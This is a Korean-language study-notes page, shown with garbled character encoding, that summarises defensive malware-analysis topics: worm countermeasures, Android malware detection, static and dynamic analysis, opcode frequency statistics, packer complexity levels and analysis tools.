      • ํ•œ ๊ฐ€์ง€ ๊ธฐ์ˆ ์€ ์‚ฌ์šฉ๋˜์ง€ ์•Š๋Š” ๋กœ์ปฌ IP address๋กœ์˜ ์ˆ˜์‹  traffic์„ ์ฐพ๋Š” ๊ฒƒ์ž„.
    • Egress monitor
      • ๊ธฐ์—… network์™€ internet ๊ฒฝ๊ณ„๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๊ฐœ๋ณ„ LAN์˜ egress ์ง€์ ์— ์œ„์น˜
      • Scanning ๋˜๋Š” ๊ธฐํƒ€ ์˜์‹ฌ์Šค๋Ÿฌ์šด ๋™์ž‘์˜ ์ง•ํ›„์— ๋Œ€ํ•ด ๋ฐœ์‹  traffic ๋ชจ๋‹ˆํ„ฐ๋ง

Worm Countermeasures

  • Virus์™€ worm ๋Œ€์‘ ๊ธฐ์ˆ ์— ์ƒ๋‹นํ•œ ์ค‘๋ณต ์กด์žฌ
  • Worm์ด ๋จธ์‹ ์— ์ƒ์ฃผํ•˜๋ฉด anti-virus ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํƒ์ง€ ๋ฐ ์ œ๊ฑฐ ๊ฐ€๋Šฅ
  • ๊ฒฝ๊ณ„ network ํ™œ๋™ ๋ฐ ์‚ฌ์šฉ๋Ÿ‰ ๋ชจ๋‹ˆํ„ฐ๋ง์ด worm ๋ฐฉ์–ด์˜ ๊ธฐ์ดˆ๊ฐ€ ๋  ์ˆ˜ ์žˆ์Œ
  • Worm ๋ฐฉ์–ด ์ ‘๊ทผ ๋ฐฉ์‹ ํฌํ•จ ์‚ฌํ•ญ
    • Signature ๊ธฐ๋ฐ˜ worm scan ํ•„ํ„ฐ๋ง
    • Filter ๊ธฐ๋ฐ˜ worm ์–ต์ œ
    • Payload ๋ถ„๋ฅ˜ ๊ธฐ๋ฐ˜ worm ์–ต์ œ
    • Threshold Random Walk (TRW) scan ํƒ์ง€
    • Rate limiting
    • Rate halting

Digital Immune System

  • ๋””์ง€ํ„ธ ๋ฉด์—ญ ์‹œ์Šคํ…œ์€ ์ธ๊ฐ„์˜ ๋ฉด์—ญ ์ฒด๊ณ„์™€ ์œ ์‚ฌํ•˜๊ฒŒ ์ž‘๋™ํ•˜๋Š” ํฌ๊ด„์ ์ธ anti-virus ๋ฐฉ์‹์„ ์ œ๊ณต
  • ์ž‘๋™ ์›๋ฆฌ:
    1. ์‹œ์Šคํ…œ์—์„œ ์˜์‹ฌ์Šค๋Ÿฌ์šด ํ”„๋กœ๊ทธ๋žจ์ด ํƒ์ง€๋˜๋ฉด, ๋ถ„์„์„ ์œ„ํ•ด ์ค‘์•™ ์„œ๋ฒ„๋กœ ์ „์†ก๋จ.
    2. ์ค‘์•™ ์„œ๋ฒ„๋Š” ํ”„๋กœ๊ทธ๋žจ์„ ๋ถ„์„ํ•˜์—ฌ ์•…์„ฑ ์ฝ”๋“œ๋กœ ํ™•์ธ๋˜๋ฉด ์‹œ๊ทธ๋‹ˆ์ฒ˜์™€ ์น˜๋ฃŒ๋ฒ•์„ ์ƒ์„ฑ
    3. ์ด ์ •๋ณด๋Š” ๋ชจ๋“  ํด๋ผ์ด์–ธํŠธ์—๊ฒŒ ์ž๋™์œผ๋กœ ์ „ํŒŒ๋˜์–ด ์ƒˆ๋กœ์šด ์œ„ํ˜‘์— ์‹ ์†ํ•˜๊ฒŒ ๋Œ€์‘

Android Malware Detection

DroidAPIMiner

  • ์„ค์น˜ ์‹œ์ ์˜ API level ๋ถ„์„
    • Malware์—์„œ ์ž์ฃผ ์‚ฌ์šฉ๋˜๋Š” ์ค‘์š”ํ•œ API call์— ์ง‘์ค‘ ๏ƒ  Dangerous API
    • API + parameters ๏ƒ  ์œ„ํ—˜
  • ์ •์  ๋ถ„์„

MADAM

  • ์ •์ƒ ๋™์ž‘๊ณผ ์•…์„ฑ ๋™์ž‘์„ ๊ตฌ๋ณ„ํ•˜๊ธฐ ์œ„ํ•ด kernel-level ๋ฐ user-level์—์„œ Android ๋ชจ๋‹ˆํ„ฐ๋ง
  • ๋‹ค์ค‘ ๋ ˆ๋ฒจ ๋ชจ๋‹ˆํ„ฐ๋ง
    • 1๋‹จ๊ณ„: System call ๋ชจ๋‹ˆํ„ฐ๋ง (open, ioctl, brk, read, write, exit, close, sendto, sendmsg, recvfrom, recvmsg)
    • 2๋‹จ๊ณ„: ์‚ฌ์šฉ์ž ์œ ํœด ์ƒํƒœ ์—ฌ๋ถ€ (Activity monitor) / ์ „์†ก๋œ SMS ์ˆ˜ (SMS monitor)
  • ์‹คํ—˜
    • ์˜์‹ฌ์Šค๋Ÿฌ์šด ์š”์†Œ๋ฅผ ์ˆ˜๋™์œผ๋กœ ์ •์˜

Android Malware Analysis with Machine Learning

  • Multi-modal Neural Networks
  • 2019๋…„ 3์›” ๋ฐœํ‘œ
  • Google Scholar ์ธ์šฉ: 193
  • ํƒ์ง€ ์ •ํ™•๋„: 98%

Malware Analysis

Issues on Malware Analysis

  • Malware ๋ฐฉ์–ด
    • ์ˆ˜๋™ ๋ถ„์„ ์ค‘์š”
    • ๋™์ž‘ ์ดํ•ด, ๋Œ€์‘์ฑ… ๊ฐœ๋ฐœ ๋ฐ signature ์ƒ์„ฑ
    • Malware ์ฆ๊ฐ€ ์†๋„๋ฅผ ๋”ฐ๋ผ์žก๊ธฐ ์–ด๋ ค์›€
    • 8,000,000 / 3 / 30 = 88,889 โ‰’ 90,000 per day

PE file format

Virtual address space

Static Analysis vs. Dynamic Analysis

  • ์ •์  ๋ถ„์„
    • ์‹คํ–‰ ์—†์ด malware binary ๋ถ„์„
    • ๋‹ค์–‘ํ•œ ๋ถ„์„ ์ ‘๊ทผ ๋ฐฉ์‹
      • Instruction ๋นˆ๋„ ๋ถ„์„
      • Control flow graph (CFG) ๋ถ„์„
      • System call ํ˜ธ์ถœ ์ˆœ์„œ ๋ถ„์„
      • Block ๊ธฐ๋ฐ˜ ์œ ์‚ฌ์„ฑ ๋ถ„์„
      • Malware ์‹œ๊ฐํ™”
    • ์žฅ์ 
      • ๋ชจ๋“  binary code ๋ถ„์„ ๊ฐ€๋Šฅ
    • ๋ฌธ์ œ์ 
      • ๋‹ค์–‘ํ•œ packing ๊ธฐ์ˆ 
      • Polymorphic & Metamorphic worm
      • ๋Œ€๋ถ€๋ถ„์˜ worm์— packing ๊ธฐ์ˆ  ์ ์šฉ๋จ
  • ๋™์  ๋ถ„์„ ๊ธฐ์ˆ ์„ ์ด์šฉํ•œ ๋ถ„์„ ํ•„์š”!

Dynamic Analysis

  • ๋ถ„์„ ํ™˜๊ฒฝ
    • FTP Server
    • Malware sample ๋ฐ ์‹คํ–‰ ์ถ”์ 
    • ๋ถ„์„ ์„œ๋ฒ„
      • Pin ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹คํ–‰ ์ถ”์  ์ถ”์ถœ
    • ๋ชจ๋‹ˆํ„ฐ๋ง ๋จธ์‹ 
      • ์›๊ฒฉ ๋ช…๋ น ์ธํ„ฐํŽ˜์ด์Šค
  • Windows OS
  • VMware vSphere ESXi 5.1
  • PIN Visual Studio 2010
  • PowerCLI

Frequency Analysis - Opcode Frequency

OpcodeGoodwareKernel RKUser RKToolsBotTrojanVirusWorms
mov25.3%37.0%29.0%25.4%34.6%30.5%16.1%22.2%
push19.5%15.6%16.6%19.0%14.1%15.4%22.7%20.7%
call8.7%5.5%8.9%8.2%11.0%10.0%9.1%8.7%
pop6.3%2.7%5.1%5.9%6.8%7.3%7.0%6.2%
cmp5.1%6.4%4.9%5.3%3.6%3.6%5.9%5.0%
jz4.3%3.3%3.9%4.3%3.3%3.5%4.4%4.0%
lea3.9%1.8%3.3%3.1%2.6%2.7%5.5%4.2%
test3.2%1.8%3.2%3.7%2.6%3.4%3.1%3.0%
jmp3.0%4.1%3.8%3.4%3.0%3.4%2.7%4.5%
add3.0%5.8%3.7%3.4%2.5%3.0%3.5%3.0%
jnz2.6%3.7%3.1%3.4%2.2%2.6%3.2%3.2%
retn2.2%1.7%2.3%2.9%3.0%3.2%2.0%2.3%
xor1.9%1.1%2.3%2.1%3.2%2.7%2.1%2.3%
and1.3%1.5%1.0%1.3%0.5%0.6%1.5%1.6%
  • Malware์˜ ๋นˆ๋„ ๋ถ„ํฌ๋Š” ์ •์ƒ ์†Œํ”„ํŠธ์›จ์–ด์™€ ๋‹ค๋ฆ„

  • ํŠน์ง•

    • Opcode ๋นˆ๋„ (์ •์  ๋ถ„์„)
    • <Daniel Bilar, โ€œStatistical Structures: Fingerprinting Malware for Classification and Analysisโ€, Black Hat, 2006>
  • Dynamic Opcode Frequency

    • Instruction ๋ฐ basic block์˜ ๋ฐ˜๋ณต ๋ฐœ๊ฒฌ
    • ๋ฌธ์ œ์ ?

Redundancy Filtering - Experiment

  • Block ์ˆ˜ ๋น„๊ต
  • Ratio(FM) ํ‰๊ท  = 1.6%
TracesOriginalRFRatioFMRatio
rtraceWin32AcidShiver_a615,35734,8695.7%19,0903.1%
rtraceWin32Agent_h1,790,73050,9872.8%27,4671.5%
rtraceWin32Agobot_1_c2,466,50844,8771.8%22,2920.9%
rtraceWin32Bionet_132,534,09595,6473.8%38,3061.5%
rtraceWin32Chiton758,99517,0522.2%9,0421.2%
rtraceWin32Deborm_a340,85215,7164.6%6,9262.0%
rtraceWin32Nilage_aa885,01610,8361.2%5,8860.7%

Malware Visualization

  • Malware ์ด๋ฏธ์ง€
    • ACM RACS 2013
      • Google citations: 60
    • IJIS journal, Feb. 2015
      • Google citations: 99
  • ML ๊ธฐ์ˆ  ์ ์šฉ ์‹œ๋„

Anti-Forensic techniques

Packing Example

Packing Trends

  • Virus Total ํŒŒ์ผ ๋ถ„์„
  • ๊ฐ ํ•ด๋งˆ๋‹ค 2,000๊ฐœ์˜ ์ƒ˜ํ”Œ
  • PE ํŒŒ์ผ ๋Œ€์ƒ
  • Packer

Packing Complexity

๋ ˆ๋ฒจ์„ค๋ช…
1๋‹จ์ผ ํŒจํ‚น, ์˜ˆ: UPX
2์žฌํŒจํ‚น, ์˜ˆ: ํŒจํ‚น๋œ UPX PE ํŒŒ์ผ์„ UPX๋กœ ๋‹ค์‹œ ํŒจํ‚น
3๋‹ค์ค‘ ๊ณ„์ธต ํŒจํ‚น, ์˜ˆ: ๋™์ผํ•˜๊ฑฐ๋‚˜ ๋‹ค๋ฅธ ํŒจ์ปค๋กœ ํŒŒ์ผ์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์—ฌ๋Ÿฌ ๋ฒˆ ํŒจํ‚น
4์œ ํ˜• 1, 2, ๋˜๋Š” 3 + ์›๋ณธ ์ฝ”๋“œ๊ฐ€ ๊ฐ€์žฅ ๊นŠ์€ ๋งˆ์ง€๋ง‰ ๊ณ„์ธต์ด ์•„๋‹Œ ๋‚ด๋ถ€ ๊ณ„์ธต ์ค‘ ํ•œ ๊ณณ์—์„œ ๋ฐœ๊ฒฌ๋จ, ์˜ˆ: UPolyX
5์œ ํ˜• 1, 2, ๋˜๋Š” 3 + ์›๋ณธ ํ”„๋กœ๊ทธ๋žจ์˜ ์–ธํŒจํ‚น์„ ๋‹ด๋‹นํ•˜์ง€ ์•Š๋Š” ์™ธ๋ถ€ ํŒจ์ปค ์ฝ”๋“œ์˜ ์ž‰์—ฌ ๋ถ€๋ถ„์„ ๊ฐ€์ง. ์ด๋Š” ํ˜ผ๋ž€ ๋ฐ ๋‚œ๋…ํ™”๋ฅผ ์œ„ํ•œ ๋ชฉ์ . ์˜ˆ: ACProtect
6์œ ํ˜• 1, 2, ๋˜๋Š” 3 + ๋ฉ”์ธ ์–ธํŒจํ‚น ์ฝ”๋“œ๊ฐ€ ํŒŒ์ผ์˜ ์—ฌ๋Ÿฌ ๋‹ค๋ฅธ ๋ถ€๋ถ„์— ์œ„์น˜ํ•œ ๋ณ„๋„ sub-unpacker ์ง‘ํ•ฉ์„ ์ˆ˜์ง‘ํ•˜๊ณ , ์ด๋ฅผ ๊ฒฐํ•ฉํ•˜์—ฌ ์›๋ณธ ํ”„๋กœ๊ทธ๋žจ์„ ์–ธํŒจํ‚น. ์–ธํŒจํ‚น ๋กœ์ง์€ ๋ฉ”์ธ ์–ธํŒจํ‚น ์ฝ”๋“œ๊ฐ€ ์•„๋‹Œ sub-unpacker์— ์œ„์น˜. ์˜ˆ: Frankenstein
7ํŒจ์ปค ์ œ์ž‘์ž๊ฐ€ ๋ฏธ๋ฆฌ ๊ฒฐ์ •ํ•œ ํŠน์ • ์™ธ๋ถ€ ์กฐ๊ฑด ํ•˜์—์„œ๋งŒ ์›๋ณธ ํ”„๋กœ๊ทธ๋žจ์˜ ๋‹จ์ผ fragment๋งŒ ์–ธํŒจํ‚น๋˜๋Š” ํŒจ์ปค. ์˜ˆ: Armadillo
8๊ฐ€์ƒํ™”(Virtualization)๋ฅผ ์‚ฌ์šฉํ•œ ์–ธํŒจํ‚น, ์˜ˆ: Themida

Malware Entropy

  • ํŒŒ์ผ์˜ ๋ฌด์ž‘์œ„์„ฑ(randomness)์„ ์ธก์ •ํ•˜๋Š” ์ฒ™๋„
  • ํŒจํ‚น๋˜๊ฑฐ๋‚˜ ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์€ ์ผ๋ฐ˜์ ์œผ๋กœ ์—”ํŠธ๋กœํ”ผ๊ฐ€ ๋†’๊ฒŒ ๋‚˜ํƒ€๋‚˜๋ฏ€๋กœ, ์•…์„ฑ์ฝ”๋“œ ํƒ์ง€์˜ ํ•œ ์ง€ํ‘œ๋กœ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Œ.

Malware Analysis Tools

  • Virus Total: ์›น ๊ธฐ๋ฐ˜ ์„œ๋น„์Šค๋กœ, ์—ฌ๋Ÿฌ anti-virus ์—”์ง„์„ ์‚ฌ์šฉํ•˜์—ฌ ํŒŒ์ผ์„ ์Šค์บ”ํ•˜๊ณ  ๋ถ„์„ ๊ฒฐ๊ณผ๋ฅผ ์ œ๊ณต
  • PE View: ์œˆ๋„์šฐ ์‹คํ–‰ ํŒŒ์ผ(PE)์˜ ๊ตฌ์กฐ๋ฅผ ์ƒ์„ธํ•˜๊ฒŒ ๋ณด์—ฌ์ฃผ๋Š” ๋„๊ตฌ
  • Detect It Easy (DIE): ํŒŒ์ผ์˜ ์ข…๋ฅ˜, ์‚ฌ์šฉ๋œ ํŒจ์ปค, ์—”ํŠธ๋กœํ”ผ, ๋ฌธ์ž์—ด ๋“ฑ ๋‹ค์–‘ํ•œ ์ •๋ณด๋ฅผ ๋ถ„์„ํ•˜๋Š” ๋„๊ตฌ
  • IDA Pro: Hex-rays์‚ฌ์—์„œ ๊ฐœ๋ฐœํ•œ ๊ฐ•๋ ฅํ•œ disassembler ๋„๊ตฌ๋กœ, ๋ฆฌ๋ฒ„์Šค ์—”์ง€๋‹ˆ์–ด๋ง ๋ฐ ์•…์„ฑ์ฝ”๋“œ ๋ถ„์„์— ๋„๋ฆฌ ์‚ฌ์šฉ
์ตœ๊ทผ ์ˆ˜์ •: 26. 6. 12. ์˜คํ›„ 3:28
Contributors: kmbzn, Claude Sonnet 4.6

BUILT WITH

CloudflareNode.jsGitHubGitVue.jsJavaScriptVSCodenpm

All trademarks and logos are property of their respective owners.
ยฉ 2026 kmbzn ยท MIT License